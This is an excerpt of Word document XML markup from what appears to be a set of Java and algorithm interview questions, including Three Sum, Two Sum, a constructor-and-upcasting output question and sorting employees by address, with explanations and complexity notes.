      <w:r w:rsidR="0040341D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203F159" w14:textId="5D8219AC"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 xml:space="preserve">       Output: [ [-1,-1,2], [-1,0,1] ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C83C5D0" w14:textId="7EAE4BE3"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What is Time complexity and Space complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505457C2" w14:textId="7FA24BC1" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="0040341D" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How can you optimize the time complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB79195" w14:textId="640F0F78"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p>
    <w:p w14:paraId="497DC8D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798FCC1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9611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4425B3E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threeSu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73231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5D17285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C726CF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or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orting the array to apply two-pointer technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBFD4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8C05EB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FD743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 elements for the first number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460E3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40A975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ontinue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CF9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AE786A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p>
    <w:p w14:paraId="5F25D7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second pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4246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third pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85F40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EEFA7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E0ABBB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7CCFF5DA"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117AA0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3E19AF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sLis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5101DA5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second pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21ACF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F67C5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600DF1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01FC2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third pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133EE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4D33F6"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5CCF691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BFE7F0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ve both pointers after finding a valid triplet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BFED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1D4B788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735AF23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0BCD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larger sum, so move left pointer to the right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7C6C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4C0A2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smaller sum, so move right pointer to the left</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D323E0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819A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17074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7E3B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p>
    <w:p w14:paraId="31CDE1D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25DE0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26850CCF"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4924D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soluti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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617E69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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5DA1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oluti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reeSu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p>
    <w:p w14:paraId="1BBC76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sult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282582A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25BE81" w14:textId="1B1F7C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F028877"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1F3A2E00"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the array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 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 where nnn is the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160377B7"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o-pointer approach</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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fore, the overall time complexity of this algorithm is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA06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402D5969"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Optimize the Time Complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B97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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C413ED2"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CE4B95" w:rsidRDefault="00212F69" w:rsidP="00212F69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7358CE61" w14:textId="2E49D464" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="384" w:name="_Toc197867598"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00200024" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>TwoSum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w14:paraId="7C31B724" w14:textId="77777777" w:rsidR="00DD47F9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="00DD47F9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00DD47F9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: nums = [2,7,11,15], target = 9 Output: [0,1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BEB99" w14:textId="7A5FCC52"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Explanation: nums[0] + nums[1] = 2 + 7 = 9, so return [0, 1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A0873" w14:textId="482E5069"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How will you optimize the time complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2437E" w14:textId="33CFB844" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD47F9" w:rsidP="00DD47F9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is space complexity?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914141C" w14:textId="30B7330E"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F46B6E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3C93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o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ABCC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9871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number and its index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FF3B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444969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6519E5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33F2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7E3627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652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complement exists in the map, return the pair of indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D95F0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1EB8A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C9DB75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8FE0B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FADCC3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current number and its index to the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F2E3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F1DF471"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37467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2969AD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solution is found (not necessary for this problem as per constraints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF2DF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F53C409"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45C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AF211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94DB46"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6BACF28E"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4E22187"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22D204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283BC3F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dice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7D8DC5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5D0E" w14:textId="04D57895"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228765"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Time Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB107D4"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Time Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: O(n)O(n)O(n), where nnn is the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55863D8F"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Space Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: O(n)O(n)O(n), where nnn is the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDE211"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Why this is Optimized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0D989"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CE4B95" w:rsidRDefault="00DB464B" w:rsidP="00DB464B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00DB5DF3" w:rsidP="00DB5DF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0161FD93" w14:textId="0651492B" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="_Toc197867599"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00B369F7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w14:paraId="2749AF6B" w14:textId="688A62FD"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4B657F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain the output line by line in below code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6431D17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663CC0E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C14A7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69537ED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34F6D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Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF351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0D4345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57E8623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90CC0CF"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1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D7D1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CC4EEE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6A0D6D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3AF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4F5311B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0DB24A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219AA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extend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1DA551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A23974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7270193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83842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Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71C91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3BAF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79D6F34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63FA889"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method m1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13315D0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7CA6D1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5BC726B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225899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751BF5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C95622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9E3159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in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C0D84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3667D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E39D46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B97649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19FACC8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4584F81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92E41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1E9F3F3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5E48465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5BE738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4662132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3B85793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0A88EA3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418EC7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1D93F2A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4FD152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DC57F3" w14:textId="1C76F968"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB6C7F" w14:textId="211DBF87"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FBBCB"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 = new Parent();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B421B5"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ent constructor is invoked, so the output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A7F6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7D07962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6FFF057D"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5723AE8C"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 = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC137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parent Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B97E0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5523E4C6"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81F49B3"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18FDD1EA"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h = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6ACD0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you are upcasting a Child object to a Parent reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2DDA4" w14:textId="4A066768"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77C1825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B28F710"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l = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B0D2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lso an upcast, similar to the previous case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054AA8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43EC7C34"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0161A54E"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD14A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80EB3F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271C096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9A10D4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2884A38"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31941AF0"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19DA45C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65B4906E"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B15A653"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89A9A3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0E1BF91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22ED2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cepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393C09A5"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 and Runtime Polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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and Compile-Time Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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structor Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E5945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDE1433" w14:textId="0A2EA50E" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="386" w:name="_Toc197867600"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00CC6E85" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Code to add into the list and it should sort on the basis Address</w:t>
      </w:r>
      <w:bookmarkEnd w:id="386"/>
    </w:p>
    <w:p w14:paraId="3EB9B268" w14:textId="0A4F21A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AD5CB3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a code to add into the list and it should sort on the basis Address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF859F"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7E5F0A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r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ddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E83AC"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p>
    <w:p w14:paraId="4E1E3620"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80F3EE4"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7BECA5C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pune'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1250D"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nagpur'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01174881"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453C1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2EFB8A1" w14:textId="3FBA1C00"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00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zz'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE1D5D" w14:textId="6FA7368F"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Pr="00CE4B95" w:rsidRDefault="0031605C" w:rsidP="0031605C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B622B6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0279C2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9D810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C61C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3F006E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A44BBA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9E0E92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5DB9C4"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Emp object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC4EF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5D8356"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18469E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FDEF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7789304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0E46C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ED7B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 for Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765D4D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A2AAF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4384EF4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BC60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4857C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toString() for easy printing of Emp objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C3C5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283C7A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8EF05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ddre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AA6121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1001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610F9D4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1080C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286A8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8B343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Emp objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E78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une"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72321C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agpur"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077522F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umbai"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB72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lhi"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED48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ZZ"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC42C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B006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mp objects to a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646BFC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1DB68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7E388E9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5AC35E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13FDA8B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053F5BB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6AAD408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919A3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ased on the Address field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D51C2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ddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5A9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583F9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list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438BB98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list based on Address:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625942B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0413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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1B3D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C298C"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A3C36" w14:textId="63F6B645"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3736B6" w14:textId="77777777" w:rsidR="0031605C" w:rsidRPr="00CE4B95" w:rsidRDefault="0031605C" w:rsidP="0031605C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124AC5AA" w14:textId="291A617C" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="_Toc197867601"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00807B1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w14:paraId="598DC7F9" w14:textId="38577BD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812948" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the output?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F974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CFC2DC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176009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4701891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20F4B78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6730B7A3"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5301D80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8C89ED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8371D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34B2C149"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8ADDD3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0D778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0CB048D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1E85506"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912A1F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ADD6CC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BA40B61"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F555B5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189DB694"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72186A"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51F93B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773B5F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4D18ABA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64B3A60" w14:textId="4B9A96F8"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F3D84A8" w14:textId="5741E4DC"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA88A65"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 unique entries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
